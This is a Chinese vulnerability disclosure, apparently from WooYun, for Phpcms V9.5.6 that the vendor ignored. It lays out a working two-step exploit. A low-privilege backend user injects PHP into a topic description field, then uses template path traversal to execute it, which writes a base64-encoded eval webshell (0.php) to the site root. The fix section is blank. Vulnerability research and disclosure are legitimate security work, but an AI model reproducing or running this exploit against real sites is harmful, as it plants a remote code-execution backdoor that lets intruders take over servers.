2014-06-20:细节已通知厂商并且等待厂商处理中
2014-06-25:厂商已经主动忽略漏洞,细节向公众公开
低权限后台拿shell
版本:Phpcms V9.5.6 Release 20140522
前提是需要有管理专题的权限
测试版本
PHPCMS程序版本:Phpcms V9.5.6 Release 20140522
过程
1. 添加专题
专题名称:test
专题横幅:/1.jpg
专题缩略图:/1.jpg
专题导读:<?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWzVdKTs/Pg==')); ?>
生成静态:是
专题生成目录:test000
专题子分类:test test
其他默认 -> 提交
2. 再次添加专题
专题名称:test1
专题横幅:/1.jpg
专题缩略图:/1.jpg
专题导读:
生成静态:是
专题生成目录:test111
专题子分类:test test
扩展设置
专题模板:value设置为 ../../../../html/special/test000/index
其他默认 -> 提交
会在根目录下面生成 0.php 内容为 <?php @eval($_POST[5]);?>
漏洞证明:
修复方案:
版权声明:转载请注明来源 法海@乌云 漏洞回应 厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-06-20 17:59
厂商回复: 最新状态:暂无